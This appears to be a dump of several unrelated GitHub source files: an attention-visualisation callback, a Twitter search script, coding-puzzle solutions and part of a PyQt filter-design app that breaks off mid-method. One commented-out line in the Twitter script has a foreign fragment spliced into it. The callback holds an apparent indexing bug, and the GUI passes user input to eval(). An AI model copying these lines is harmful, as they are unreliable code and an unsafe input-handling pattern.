import get_logger\n\nLOGGER = get_logger(__name__)\nmatplotlib.use('Agg')\n\n\nclass MemoryAttentionTrackingCallback(Callback):\n def __init__(\n self,\n stage: str,\n save_dir: str | Path,\n memory_level: Literal['tokens', 'mentions'],\n memory_type: Literal['relations', 'entities'],\n entity_labels: dict[str, EntityType],\n relation_types: dict[str, RelationType],\n tokenizer: PreTrainedTokenizer,\n all_types: bool = False,\n document_ids: list[int] | None = None,\n ):\n self._stage = stage\n self._memory_level = memory_level\n self._memory_type = memory_type\n self._save_dir = Path(save_dir)\n self._entity_labels = entity_labels\n self._all_types = all_types\n self._relation_types = relation_types\n self._document_ids = document_ids\n self._tokenizer = tokenizer\n self._examples_to_store: list[int] = []\n self._save_dir.mkdir(parents=True, exist_ok=True)\n\n def on_test_batch_end( # type: ignore[override]\n self,\n trainer: \"pl.Trainer\",\n pl_module: \"pl.LightningModule\",\n outputs: dict[str, Any] | None,\n batch: Any,\n batch_idx: int,\n dataloader_idx: int,\n ) -> None:\n if self._stage == 'test' and outputs is not None:\n doc_ids = batch['doc_ids']\n memory_modules_attentions = outputs['memory_modules_attentions']\n memory_attentions = memory_modules_attentions[f'{self._memory_level}_flow']\n entity_memory_attentions = memory_attentions['entity'].cpu().detach()\n relation_memory_attentions = memory_attentions['relation'].cpu().detach()\n\n docs = trainer.datamodule.test_dataset.documents # type: ignore\n for batch_idx in range(doc_ids.shape[0]):\n doc_id = doc_ids[batch_idx].detach().cpu().item()\n valid_mentions = outputs['pos_valid_mentions'][batch_idx].detach().cpu()\n valid_mentions_masks = (\n [outputs['pos_valid_mentions_masks']][batch_idx].detach().cpu()\n )\n valid_mentions = valid_mentions[valid_mentions_masks.bool().squeeze()]\n mention_spans = batch['mention_orig_spans'].detach().cpu()\n\n if self._document_ids and doc_id not in self._document_ids:\n continue\n\n labels_dict: dict = (\n self._entity_labels\n if self._memory_type == 'entities'\n else self._relation_types # type: ignore\n )\n attentions = (\n entity_memory_attentions\n if self._memory_type == 'entities'\n else relation_memory_attentions\n )\n labels = [label.short_name for label in labels_dict.values()]\n\n if self._memory_level == 'mentions':\n self.visualize_mentions(\n doc_id,\n mention_spans=mention_spans[batch_idx],\n document=docs[doc_id],\n labels=labels,\n valid_mentions=valid_mentions,\n memory_attention=attentions[batch_idx],\n save_dir=self._save_dir,\n )\n else:\n self.visualize_tokens(\n doc_id,\n document=docs[doc_id],\n labels=labels,\n memory_attention=attentions[batch_idx],\n save_dir=self._save_dir,\n )\n\n def visualize_mentions(\n self,\n doc_id: int,\n mention_spans: torch.Tensor,\n valid_mentions: torch.Tensor,\n document: TokenizedDocument,\n labels: list[str],\n memory_attention: torch.Tensor,\n save_dir: Path,\n ) -> None:\n valid_mention_spans = mention_spans[valid_mentions].detach().cpu()\n valid_mention_memory_attention = memory_attention[valid_mentions]\n other_mentions_mask = torch.ones(mention_spans.shape[0], dtype=torch.bool)\n other_mentions_mask[valid_mentions] = False\n other_mentions_memory_attention = memory_attention[other_mentions_mask]\n\n n_plots = 3 + len(labels) if self._all_types else 2\n fig, axs = plt.subplots(\n n_plots,\n 2,\n figsize=(valid_mention_spans.shape[0], 12 if self._all_types else 4),\n sharey='row',\n sharex='col',\n gridspec_kw={\n 'width_ratios': [4, 1],\n 'height_ratios': [2] + [1] * ((2 + len(labels)) if self._all_types else 1),\n },\n )\n\n axs[1, 0].set_ylabel('Sum')\n color = cm.rainbow(np.linspace(0, 1, len(labels)))\n\n if self._all_types:\n for i, label in enumerate(labels):\n axs[n_plots - 1 - i, 0].set_ylabel(label, color=color[i])\n axs[2, 0].set_ylabel('Ratio')\n\n x = range(valid_mention_spans.shape[0])\n\n for _, _axs in enumerate(axs):\n for ax in _axs:\n ax.set_ylim(0, 1)\n ax.get_xaxis().set_visible(False)\n\n y_s = []\n axs[0, 0].set_xticks(x)\n axs[0, 0].axis('off')\n axs[0, 0].set_ylim(0, 0.2)\n\n for i in range(valid_mention_spans.shape[0]):\n mention_span = valid_mention_spans[i]\n phrase = ' '.join(\n t.phrase for t in document.tokens[mention_span[0] : mention_span[1]] # type: ignore\n )\n\n mention_memory_attentions = valid_mention_memory_attention[i, :]\n\n axs[0, 0].text(\n i,\n 0.05,\n phrase,\n rotation=90,\n fontsize=18,\n verticalalignment='bottom',\n horizontalalignment='center',\n )\n y_s.append(mention_memory_attentions)\n\n y = np.vstack(y_s).transpose()\n y_stacked = np.zeros_like(y[0])\n y_sum = np.sum(y, axis=0)\n axs[1, 0].bar(x, y_sum, color='b')\n axs[1, 0].set_ylim(0, np.max(y_sum) * 1.1)\n\n if self._all_types:\n for j in range(y.shape[0]):\n axs[n_plots - 1 - j, 0].bar(x, y[j], color=color[j])\n axs[2, 0].bar(x, y[j] / y_sum, bottom=y_stacked / y_sum, color=color[j])\n y_stacked += y[j]\n\n x = range(3)\n axs[0, 1].set_xticks(x)\n axs[0, 1].axis('off')\n\n y_s = []\n\n for i, (phrase, values) in enumerate(\n (\n ('max', other_mentions_memory_attention.sum(dim=1).max()),\n ('mean', other_mentions_memory_attention.sum(dim=1).mean()),\n ('min', other_mentions_memory_attention.sum(dim=1).min()),\n )\n ):\n axs[0, 1].text(\n i,\n 0.05,\n f'Others ({phrase})',\n rotation=90,\n fontsize=18,\n verticalalignment='bottom',\n horizontalalignment='center',\n )\n\n y_s.append(values)\n\n y = np.vstack(y_s).transpose()\n y_sum = np.sum(y, axis=0)\n axs[1, 1].bar(x, y_sum, color='b')\n\n plt.tight_layout()\n plt.savefig(Path(save_dir) / f'{doc_id}.jpg', dpi=200)\n\n def visualize_tokens( # noqa\n self,\n doc_id: int,\n document: TokenizedDocument,\n labels: list[str],\n memory_attention: torch.Tensor,\n save_dir: Path,\n ) -> None:\n width_ratios = [len(sentence.tokens) for sentence in document.sentences]\n n_plots = 3 + len(labels) if self._all_types else 2\n fig, axs = plt.subplots(\n n_plots,\n len(document.sentences),\n figsize=(int(0.7 * len(document.tokens)), 12 if self._all_types else 6),\n sharey='row',\n sharex='col',\n gridspec_kw={\n 'width_ratios': width_ratios,\n 'height_ratios': [4] + [1] * ((2 + len(labels)) if self._all_types else 1),\n },\n )\n\n axs[1, 0].set_ylabel('Sum')\n color = cm.rainbow(np.linspace(0, 1, len(labels)))\n\n if self._all_types:\n for i, label in enumerate(labels):\n axs[n_plots - 1 - i, 0].set_ylabel(label, color=color[i])\n axs[2, 0].set_ylabel('Ratio')\n\n for i, _axs in enumerate(axs):\n if i > 0:\n for ax in _axs:\n ax.set_ylim(0, 1)\n ax.get_xaxis().set_visible(False)\n\n y_sum_max = 0\n\n for i, sentence in enumerate(document.sentences):\n x = range(len(sentence.tokens))\n axs[0, i].set_xticks(x)\n axs[0, i].axis('off')\n axs[0, i].set_ylim(0, 0.2)\n\n y_s = []\n\n for j, token in enumerate(sentence.tokens):\n token_memory_attentions = memory_attention[token.span_start : token.span_end, :]\n token_memory_attentions = token_memory_attentions.sum(dim=0)\n\n axs[0, i].text(\n j,\n 0.05,\n token.phrase,\n rotation=90,\n fontsize=18,\n verticalalignment='bottom',\n horizontalalignment='center',\n )\n y_s.append(token_memory_attentions)\n\n y = np.vstack(y_s).transpose()\n y_stacked = np.zeros_like(y[0])\n y_sum = np.sum(y, axis=0)\n local_y_sum_max = np.max(y_sum)\n\n if local_y_sum_max > y_sum_max:\n y_sum_max = local_y_sum_max\n\n axs[1, i].bar(x, y_sum, color='b')\n\n if self._all_types:\n for j in range(y.shape[0]):\n axs[n_plots - 1 - j, i].bar(x, y[j], color=color[j])\n axs[2, i].bar(x, y[j] / y_sum, bottom=y_stacked / y_sum, color=color[j])\n y_stacked += y[j]\n\n axs[1, 0].set_ylim(0, y_sum_max)\n\n plt.tight_layout()\n plt.savefig(Path(save_dir) / f'{doc_id}.jpg', dpi=200)\n","repo_name":"kosciukiewicz/similarity_based_memory_re","sub_path":"memory_re/utils/callbacks/memory_attention_tracking.py","file_name":"memory_attention_tracking.py","file_ext":"py","file_size_in_byte":10610,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"2933644631","text":"#!/usr/bin/python\n\nimport twitter\nimport pickle\nimport time\n\n\n\n# Twitter API keys go here\nCONSUMER_KEY = ''\nCONSUMER_SECRET = ''\n\nOAUTH_TOKEN = ''\nOAUTH_TOKEN_SECRET = ''\n\nauth = twitter.oauth.OAuth(OAUTH_TOKEN, OAUTH_TOKEN_SECRET,\n CONSUMER_KEY, CONSUMER_SECRET)\n\ntwitter_api = twitter.Twitter(auth=auth)\n\nq = 'prayfor' \ncount = 30\n'''\ntweet_texts = []\ntweet_mentions = []\ntweet_hashtags = []\ntweet_bios = []\n'''\nsearch_results = twitter_api.search.tweets(q=q, count=count)\nstatuses = search_results['statuses']\n\n'''\n# save relevant data\ntweet_texts += [status['text'] for status in statuses]\ntweet_mentions += [mention['screen_name'] for status in statuses\n for mention in status['entities']['user_mentions']]\ntweet_hashtags += [hashtag['text'] for status in statuses\n for hashtag in status['entities']['hashtags']]\ntweet_bios += [status['upickle.dump(all_media, open(path+'%s_ig_%s.p' % (used_tag,curret_time),'wb'))ser']['description'] for status in statuses \n if status['user']['description']]\n'''\n\ncurret_time = time.asctime(time.localtime(time.time()))\nfor ch in [' ',':']:\n\tif ch in curret_time:\n\t\tcurret_time = curret_time.replace(ch,'_')\n\npath = '/Users/Jiwon/Desktop/socialdataanalysis/final/'\npickle.dump(statuses, open(path+'%s_%s.p' % (q,curret_time),'wb'))\n\n\n\n\n","repo_name":"jwnyoon/PrayFor","sub_path":"pickled.py","file_name":"pickled.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9277565853","text":"#\n# @lc app=leetcode.cn id=189 lang=python3\n#\n# [189] 旋转数组\n#\n\n# @lc code=start\nclass Solution:\n # 三次旋转即可\n def rotate(self, nums: List[int], k: int) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n k %= len(nums)\n self.reverse(nums, 0, len(nums)-1)\n self.reverse(nums, 0, k-1)\n self.reverse(nums, k, len(nums)-1)\n return \n\n\n def reverse(self, nums, start, end):\n while start < end:\n nums[start], nums[end] = nums[end], nums[start]\n start += 1\n end -= 1\n return\n# @lc code=end\n\n","repo_name":"purecall/my_leetcode","sub_path":"189 旋转数���.py","file_name":"189 旋转数组.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18322545681","text":"import sys\nfrom itertools import product\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef main():\n N = NI()\n for p in product(\"abc\", repeat=N):\n print(\"\".join(p))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mao-beta/AtCoder","sub_path":"ABC/ABC029/ABC029C.py","file_name":"ABC029C.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36651853294","text":"# PyQt5 modules\nfrom math import inf\nfrom PyQt5.QtWidgets import QMainWindow, QListWidgetItem, QColorDialog, QFileDialog, QDialog, QStyle, QApplication, QPlainTextEdit\nfrom PyQt5.QtCore import Qt\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\n\n# Project modules\nfrom src.ui.mainwindow import Ui_MainWindow\nfrom src.lineDialog import lineDialog\nfrom src.package.Dataset import Dataset\nimport src.package.Filter as Filter\nfrom src.package.Filter import AnalogFilter\nfrom src.widgets.exprwidget import MplCanvas\nfrom src.widgets.tf_dialog import TFDialog\nfrom src.widgets.case_window import CaseDialog\nfrom src.widgets.zp_window import ZPWindow\nfrom src.widgets.response_dialog import ResponseDialog\nfrom src.widgets.prompt_dialog import PromptDialog\nfrom src.widgets.textDialog import TextDialog\n\nfrom scipy.signal import savgol_filter\nimport scipy.signal as signal\nfrom scipy.interpolate import splrep, splev, splprep\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nfrom mplcursors import HoverMode, cursor, Selection\nfrom matplotlib.patches import Rectangle\n\nimport numpy as np\nimport random\nfrom pyparsing.exceptions import ParseSyntaxException\n\nimport pickle\n\nMARKER_STYLES = { 'None': '', 'Point': '.', 'Pixel': ',', 'Circle': 'o', 'Triangle down': 'v', 'Triangle up': '^', 'Triangle left': '<', 'Triangle right': '>', 'Tri down': '1', 'Tri up': '2', 'Tri left': '3', 'Tri right': '4', 'Octagon': '8', 'Square': 's', 'Pentagon': 'p', 'Plus (filled)': 'P', 'Star': '*', 'Hexagon': 'h', 'Hexagon alt.': 'H', 'Plus': '+', 'x': 'x', 'x (filled)': 'X', 'Diamond': 'D', 'Diamond (thin)': 'd', 'Vline': '|', 'Hline': '_' }\nLINE_STYLES = { 'None': '', 'Solid': '-', 'Dashed': '--', 'Dash-dot': '-.', 'Dotted': ':' }\n\nPOLE_COLOR = '#FF0000'\nPOLE_SEL_COLOR = '#00FF00'\nZERO_COLOR = '#0000FF'\nZERO_SEL_COLOR = '#00FF00'\n\nTEMPLATE_FACE_COLOR = '#ffcccb'\nTEMPLATE_EDGE_COLOR = '#ef9a9a'\nADD_TEMPLATE_FACE_COLOR = '#c8e6c9'\nADD_TEMPLATE_EDGE_COLOR = '#a5d6a7'\n\nSHOW_PZ_IN_HZ = True\nPZ_XLABEL = f'$\\sigma$ [1/s]' if SHOW_PZ_IN_HZ else '$\\sigma$ ($rad/s$)'\nPZ_YLABEL = f'$jf$ [Hz]' if SHOW_PZ_IN_HZ else '$j\\omega$ ($rad/s$)'\nF_TO_W = 2*np.pi\nW_TO_F = 1/F_TO_W\nSING_B_TO_F = W_TO_F if SHOW_PZ_IN_HZ else 1\nSING_F_TO_B = F_TO_W if SHOW_PZ_IN_HZ else 1\n\ndef stage_to_str(stage):\n stage_str = 'Z={'\n for z in stage.z:\n stage_str += str(z)\n stage_str += ', '\n stage_str += '} , P={'\n for p in stage.p:\n stage_str += str(p)\n stage_str += ', '\n stage_str += '} , K='\n stage_str+= str(stage.k)\n return stage_str\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setupUi(self)\n self.droppedFiles = []\n self.datasets = []\n self.datalines = []\n # self.stage_datasets = [] capaz mas adelante lo ponga para serializar también las etapas, pero creo que para ahora es mucho\n self.selected_dataset_widget = {}\n self.selected_dataline_widget = {}\n self.selected_dataset_data = {}\n self.selected_dataline_data = {}\n self.zpWindow = type('ZPWindow', (), {})()\n\n self.dl_type_flag = 0\n \n self.import_file_btn.clicked.connect(self.importFiles)\n \n self.dataset_list.currentItemChanged.connect(self.populateSelectedDatasetDetails)\n self.ds_title_edit.textEdited.connect(self.updateSelectedDatasetName)\n self.ds_addline_btn.clicked.connect(self.addDataline)\n self.ds_remove_btn.clicked.connect(self.removeSelectedDataset)\n self.ds_poleszeros_btn.clicked.connect(self.showZPWindow)\n\n self.dataline_list.currentItemChanged.connect(self.populateSelectedDatalineDetails)\n self.dl_name_edit.textEdited.connect(self.updateSelectedDataline)\n self.dl_render_cb.activated.connect(self.updateSelectedDataline)\n self.dl_transform_cb.activated.connect(self.updateSelectedDataline)\n self.dl_xdata_cb.activated.connect(self.updateSelectedDataline)\n self.dl_xscale_sb.valueChanged.connect(self.updateSelectedDataline)\n self.dl_xoffset_sb.valueChanged.connect(self.updateSelectedDataline)\n self.dl_ydata_cb.activated.connect(self.updateSelectedDataline)\n self.dl_yscale_sb.valueChanged.connect(self.updateSelectedDataline)\n self.dl_yoffset_sb.valueChanged.connect(self.updateSelectedDataline)\n self.dl_color_edit.textEdited.connect(self.updateSelectedDataline)\n self.dl_style_cb.activated.connect(self.updateSelectedDataline)\n self.dl_linewidth_sb.valueChanged.connect(self.updateSelectedDataline)\n self.dl_marker_cb.activated.connect(self.updateSelectedDataline)\n self.dl_markersize_sb.valueChanged.connect(self.updateSelectedDataline)\n self.dl_remove_btn.clicked.connect(self.removeSelectedDataline)\n self.dl_savgol_wlen.valueChanged.connect(self.updateSelectedDataline)\n self.dl_savgol_ord.valueChanged.connect(self.updateSelectedDataline)\n\n self.dl_color_pickerbtn.clicked.connect(self.openColorPicker)\n\n \n #Add a line or a point to graph.\n self.ld = lineDialog(self)\n self.addLineOrPoint.clicked.connect(self.showlineGeneratorWidget)\n self.ld.createButton.clicked.connect(self.resolveLineDialog)\n self.ld.createPointButton.clicked.connect(self.resolvePointDialog)\n \n #Draw points by hand. \n self.drawPointButton.clicked.connect(self.resolveDrawPointButton)\n self.drawLineButton.clicked.connect(self.resolveDrawLineButton)\n self.event_detection_enabled = False\n self.event_detection_enabled_line = 0\n \n #Add text\n self.textDialog = TextDialog(self)\n self.addText.clicked.connect(self.showTextWidget)\n self.textDialog.updateButton.clicked.connect(self.updateTexts)\n self.textDialog.removeButton.clicked.connect(self.removeText)\n self.textDialog.pickColorButton.clicked.connect(self.openColorPickerText)\n self.textDialog.textList.itemClicked.connect(self.updateTextDialog)\n self.textDialog.closeButton.clicked.connect(self.closeTextDialog)\n\n self.respd = ResponseDialog()\n self.resp_btn.clicked.connect(self.openResponseDialog)\n self.respd.accepted.connect(self.resolveResponseDialog)\n\n self.tfd = TFDialog()\n self.function_btn.clicked.connect(self.openTFDialog)\n self.tfd.accepted_tf.clicked.connect(self.resolveTFDialog)\n self.tfd.accepted_f.clicked.connect(self.resolveFDialog)\n\n self.csd = CaseDialog()\n self.ds_caseadd_btn.clicked.connect(self.openCaseDialog)\n self.csd.accepted.connect(self.resolveCSDialog)\n\n self.pmptd = PromptDialog()\n \n self.plt_labelsize_sb.valueChanged.connect(self.updatePlots)\n self.plt_legendsize_sb.valueChanged.connect(self.updatePlots)\n self.plt_ticksize_sb.valueChanged.connect(self.updatePlots)\n self.plt_titlesize_sb.valueChanged.connect(self.updatePlots)\n self.plt_autoscale.clicked.connect(self.autoscalePlots)\n self.plt_legendpos.activated.connect(self.updatePlots)\n self.plt_grid.stateChanged.connect(self.updatePlots)\n self.tabbing_plots.currentChanged.connect(self.updatePlots)\n \n self.plots_canvases = [\n [ self.plot_1 ],\n [ self.plot_2_1, self.plot_2_2 ],\n [ self.plot_3 ],\n [ self.plot_4_1, self.plot_4_2 ],\n [ self.plot_5 ],\n ]\n\n self.new_filter_btn.clicked.connect(self.addFilter)\n self.chg_filter_btn.clicked.connect(self.changeSelectedFilter)\n self.tipo_box.currentIndexChanged.connect(self.updateFilterParametersAvailable)\n self.define_with_box.currentIndexChanged.connect(self.updateFilterParametersAvailable)\n self.updateFilterParametersAvailable()\n\n self.new_stage_btn.clicked.connect(self.addFilterStage)\n self.remove_stage_btn.clicked.connect(self.removeFilterStage)\n\n self.actionLoad_2.triggered.connect(self.loadFile)\n self.actionSave_2.triggered.connect(self.saveFile)\n\n self.stageCursorZer = {}\n self.stageCursorPol = {}\n\n self.poles_list.itemSelectionChanged.connect(self.stage_sel_changed)\n self.zeros_list.itemSelectionChanged.connect(self.stage_sel_changed)\n self.stages_list.itemSelectionChanged.connect(self.updateStagePlots)\n\n self.filters = []\n self.selfil_cb.currentIndexChanged.connect(self.populateSelectedFilterDetails)\n self.stages_selfil_cb.currentIndexChanged.connect(self.populateSelectedFilterDetails)\n self.symmetrize_btn.clicked.connect(self.makeFilterTemplateSymmetric)\n\n self.sswapup_btn.setIcon(self.style().standardIcon(QStyle.SP_TitleBarShadeButton))\n self.sswapdown_btn.setIcon(self.style().standardIcon(QStyle.SP_TitleBarUnshadeButton))\n self.sswapup_btn.clicked.connect(self.swapStagesUpwards)\n self.sswapdown_btn.clicked.connect(self.swapStagesDownwards)\n self.autoselectstagessp_btn.clicked.connect(self.orderStagesBySos)\n\n self.prevFilterType = Filter.LOW_PASS\n self.compareapprox_cb.setCurrentIndexes([])\n \n self.pointCount = 0\n self.lineCount = 0\n\n def showTextWidget(self):\n if self.textDialog:\n self.textDialog.show()\n else:\n self.ld = TextDialog(self)\n\n\n def showlineGeneratorWidget(self):\n if self.ld:\n self.ld.show()\n else:\n self.ld = lineDialog(self)\n\n def resolveLineDialog(self):\n # Detect info to add a line to graph.\n self.ld.setLine()\n nashe = self.ld.getTitle() + \".line\"\n ds = Dataset(filepath='', origin=self.ld.l, title=self.ld.getTitle() + \".line\")\n self.addDataset(ds)\n \n def resolvePointDialog(self):\n # Detect info to add a point to graph.\n self.ld.setPoint()\n ds = Dataset(filepath='', origin=self.ld.p, title=self.ld.getTitle() + \".pt\")\n self.addDataset(ds)\n \n \n # Click event on canvas handler for drawing points.\n def on_mpl_widget_clicked(self, event):\n if not self.event_detection_enabled:\n return\n \n if event.button == 1: # Verifies if the left mouse button has been clicked\n x = event.xdata \n y = event.ydata\n \n self.drawPoint(x,y)\n \n self.addDataline()\n \n self.event_detection_enabled = False\n self.setCursor(Qt.ArrowCursor)\n \n \n # Click event on canvas handler for drawing lines\n def on_mpl_widget_clicked_line(self, event):\n if self.event_detection_enabled_line == 0:\n return\n \n if event.button == 1 and self.event_detection_enabled_line == 2:\n x = event.xdata \n y = event.ydata\n self.ld.secondPointX.setValue(x)\n self.ld.seconPointY.setValue(y)\n self.event_detection_enabled_line = 0\n \n self.drawLine()\n \n self.addDataline()\n \n self.setCursor(Qt.ArrowCursor)\n \n if event.button == 1 and self.event_detection_enabled_line == 1: # Verifies if the left mouse button has been clicked\n x = event.xdata \n y = event.ydata\n self.ld.firstPointX.setValue(x)\n self.ld.firstPointY.setValue(y)\n self.event_detection_enabled_line = 2\n \n \n \n #Allows and disallows canvases to be clicked to draw points.\n def resolveDrawPointButton(self):\n if self.event_detection_enabled == False:\n for canvas_group in self.plots_canvases:\n for canvas in canvas_group:\n canvas.canvas.mpl_connect('button_press_event', self.on_mpl_widget_clicked)\n self.setCursor(Qt.CrossCursor)\n \n self.event_detection_enabled = True\n \n #Allows and disallows canvases to be clicked to draw lines.\n def resolveDrawLineButton(self):\n if self.event_detection_enabled_line == 0:\n for canvas_group in self.plots_canvases:\n for canvas in canvas_group:\n canvas.canvas.mpl_connect('button_press_event', self.on_mpl_widget_clicked_line)\n self.setCursor(Qt.CrossCursor)\n self.event_detection_enabled_line = 1\n \n #Function used to draw a point by clicking on canvas\n def drawPoint(self, x, y):\n #Changes the lineGenerator dialog as if you were drawing a point from there\n self.ld.pointX.setValue(x)\n self.ld.pointY.setValue(y)\n self.ld.setPoint()\n ds = Dataset(filepath='', origin=self.ld.p, title= \"Point\" + str(self.pointCount))\n self.pointCount += 1\n self.addDataset(ds)\n \n def drawLine(self):\n #Changes the lineGenerator dialog as if you were drawing a line from there\n self.ld.setLine()\n ds = Dataset(filepath='', origin=self.ld.l, title= \"Line\" + str(self.lineCount))\n self.lineCount += 1\n self.addDataset(ds)\n \n def addDataset(self, ds):\n qlwt = QListWidgetItem()\n qlwt.setData(Qt.UserRole, ds)\n qlwt.setText(ds.title)\n self.dataset_list.addItem(qlwt)\n self.datasets.append(ds)\n self.datalines.append([])\n self.dataset_list.setCurrentRow(self.dataset_list.count() - 1)\n\n def removeDataset(self, i):\n #Saco los datalines\n first_dataline_index = 0\n last_dataline_index = len(self.datalines[0])\n for x in range(self.dataset_list.count()):\n if(x == 0):\n first_dataline_index = 0\n else: \n first_dataline_index += len(self.datalines[x - 1])\n if(x == i):\n break\n last_dataline_index = first_dataline_index + len(self.datalines[i])\n\n for x in range(first_dataline_index, last_dataline_index):\n self.dataline_list.takeItem(first_dataline_index)\n self.datalines.pop(i)\n\n ds = self.dataset_list.item(i).data(Qt.UserRole)\n if(ds.type == 'filter'):\n fi = self.filters.index(ds)\n self.filters.pop(fi)\n self.selfil_cb.removeItem(fi)\n self.stages_selfil_cb.removeItem(fi)\n if(self.selfil_cb.count() == 0):\n self.chg_filter_btn.setEnabled(False)\n self.dataset_list.takeItem(i)\n self.updatePlots()\n\n def addDataline(self):\n if(not self.selected_dataset_data):\n return\n dl = self.selected_dataset_data.create_dataline()\n qlwt = QListWidgetItem()\n qlwt.setData(Qt.UserRole, dl)\n qlwt.setText(dl.name)\n dli = 0\n for x in range(self.dataset_list.count()):\n ds = self.dataset_list.item(x).data(Qt.UserRole)\n dli += len(self.datalines[x])\n if(ds.origin == self.selected_dataset_data.origin):\n break\n self.dataline_list.insertItem(dli, qlwt)\n self.dataline_list.setCurrentRow(dli)\n self.datalines[self.dataset_list.currentRow()].append(dl)\n self.updateSelectedDataline()\n self.updatePlots()\n\n def removeDataline(self, i): \n try:\n dsi, dli = self.getInternalDataIndexes(i)\n del self.datalines[dsi][dli]\n self.dataline_list.takeItem(i).data(Qt.UserRole)\n del self.dataset_list.item(dsi).data(Qt.UserRole).datalines[dli]\n if(self.dataline_list.currentRow() == -1):\n self.dataline_list.setCurrentRow(self.dataline_list.count() - 1)\n except AttributeError:\n pass\n self.updatePlots()\n \n def removeSelectedDataline(self, event):\n selected_row = self.dataline_list.currentRow()\n self.removeDataline(selected_row)\n\n def removeSelectedDataset(self, event):\n selected_row = self.dataset_list.currentRow()\n self.removeDataset(selected_row)\n\n def getInternalDataIndexes(self, datalineRow):\n i = self.dataline_list.currentRow()\n for x in range(self.dataset_list.count()):\n ds = self.dataset_list.item(x).data(Qt.UserRole)\n if(i >= len(self.datalines[x])):\n i = i - len(self.datalines[x])\n else:\n return (x, i)\n return (x, i)\n\n def dragEnterEvent(self, event):\n if(event.mimeData().hasUrls()):\n event.accept()\n else:\n event.ignore()\n\n def dropEvent(self, event):\n self.statusbar.showMessage('Loading files')\n files = [u.toLocalFile() for u in event.mimeData().urls()]\n self.processFiles(files)\n\n def importFiles(self):\n options = QFileDialog.Options()\n # options |= QFileDialog.DontUseNativeDialog\n files, _ = QFileDialog.getOpenFileNames(self,\"Select files\", \"\",\"All Files (*);;CSV files (*.csv);;SPICE output files (*.raw)\", options=options)\n self.processFiles(files)\n\n def processFiles(self, filenamearray):\n for f in filenamearray:\n try:\n ds = Dataset(filepath=f)\n dataset_items_origin = [\n self.dataset_list.item(x).data(Qt.UserRole).origin\n for x in range(self.dataset_list.count())\n ]\n if(ds.origin not in dataset_items_origin):\n self.droppedFiles.append(ds.origin)\n self.addDataset(ds)\n except(ValueError):\n print('Wrong file config')\n self.statusbar.clearMessage()\n\n def openTFDialog(self):\n self.tfd.open()\n self.tfd.tf_title.setFocus()\n\n def resolveTFDialog(self):\n if not self.tfd.validateTF():\n return\n ds = Dataset(filepath='', origin=self.tfd.tf, title=self.tfd.getTFTitle())\n self.addDataset(ds)\n\n def resolveFDialog(self):\n self.tfd.t_error_label.setText(\"Generating... Please wait\")\n QApplication.processEvents()\n if not self.tfd.validateF():\n return\n self.tfd.setFValues()\n ds = Dataset(filepath='', origin= self.tfd.f, title=self.tfd.getFTitle())\n self.addDataset(ds)\n self.tfd.t_error_label.setText(\"Done!\")\n \n\n def openResponseDialog(self):\n self.respd.open()\n self.respd.input_txt.setFocus()\n\n def resolveResponseDialog(self):\n if not(self.respd.validateResponse()):\n return\n\n t = self.respd.getTimeDomain()\n expression = self.respd.getResponseExpression()\n title = self.respd.getResponseTitle()\n time_title = title + \"_timebase\"\n ans_title = title + \"_ans\"\n \n if expression == 'step':\n x = np.heaviside(t, 0.5)\n _, response = signal.step(self.selected_dataset_data.tf.tf_object, T=t)\n elif expression == 'delta':\n delta = lambda t, eps: (1 / (np.sqrt(np.pi) *eps)) * np.exp(-(t/eps)**2) #para plotear la delta\n x = delta(t, (t[1] - t[0]))\n _, response = signal.delta(self.selected_dataset_data.tf.tf_object, T=t)\n else:\n x = eval(expression)\n response = signal.lsim(self.selected_dataset_data.tf.tf_object , U = x , T = t)[1]\n \n self.selected_dataset_data.data[0][time_title] = t\n self.selected_dataset_data.data[0][title] = x\n self.selected_dataset_data.data[0][ans_title] = response\n\n self.selected_dataset_data.fields.append(time_title)\n self.selected_dataset_data.fields.append(title)\n self.selected_dataset_data.fields.append(ans_title)\n \n self.updateSelectedDataset()\n self.updateSelectedDataline()\n\n def buildFilterFromParams(self):\n if(self.prevFilterType != self.tipo_box.currentIndex()):\n self.compareapprox_cb.setCurrentIndexes([])\n self.prevFilterType = self.tipo_box.currentIndex()\n if self.tipo_box.currentIndex() in [Filter.BAND_PASS, Filter.BAND_REJECT]:\n wa = [F_TO_W * self.fa_min_box.value(), F_TO_W * self.fa_max_box.value()]\n wp = [F_TO_W * self.fp_min_box.value(), F_TO_W * self.fp_max_box.value()]\n else:\n wa = F_TO_W * self.fa_box.value()\n wp = F_TO_W * self.fp_box.value()\n \n params = {\n \"name\": self.filtername_box.text(),\n \"filter_type\": self.tipo_box.currentIndex(),\n \"approx_type\": self.aprox_box.currentIndex(),\n \"helper_approx\": self.compareapprox_cb.currentIndexes(),\n \"helper_N\": self.comp_N_box.value(),\n \"is_helper\": False,\n \"define_with\": self.define_with_box.currentIndex(),\n \"N_min\": self.N_min_box.value(),\n \"N_max\": self.N_max_box.value(),\n \"gain\": self.gain_box.value(),\n \"denorm\": self.denorm_box.value(),\n \"aa_dB\": self.aa_box.value(),\n \"ap_dB\": self.ap_box.value(),\n \"wa\": wa,\n \"wp\": wp,\n \"w0\": F_TO_W * self.f0_box.value(),\n \"bw\": [F_TO_W * self.bw_min_box.value(), F_TO_W * self.bw_max_box.value()],\n \"gamma\": self.tol_box.value(),\n \"tau0\": self.tau0_box.value(),\n \"wrg\": F_TO_W * self.frg_box.value(),\n }\n return AnalogFilter(**params)\n \n def addFilter(self):\n newFilter = self.buildFilterFromParams()\n valid, msg = 